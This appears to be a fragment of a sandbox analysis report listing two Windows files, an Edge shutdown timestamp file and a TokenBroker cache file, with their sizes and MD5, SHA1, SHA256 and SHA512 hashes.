C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

Filesize
4B

MD5
5af4219bb2787c0b9cc22771b2db6643

SHA1
e834acb8103ca68c996af0f8dd0de48ffbcca52f

SHA256
d12dbcf30565c8b58bb9ecb301b528830838bdeac03d3073d2779ba0ee6709d3

SHA512
51ef44a4a5ea9a1b6c39f78506c9ed3d774202ceeca7f6414a6d41b16edd148ff4aec81c904060a1af003a96d63f5198e3c5bb3dc0c695bc3dde87733a115214

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
f39b845ea05ab3fa78f0ba7e34e52cbc

SHA1
05afc3cc83a5b664b2a1a4544bdc52d242fe38f4

SHA256
d31d0de2fa265fc4e5430729cad5642be132e78879d93f8ecb57279002cd71f1

SHA512
372c0afeb7f15d9f80d8276fb2a714e9f3f1b1fce41dc54d25e7919dba1d2d5fd708203ddb4a977168e7480f8b8c4e49bc9c223ac974da9db8009df163c9df54

Download Submit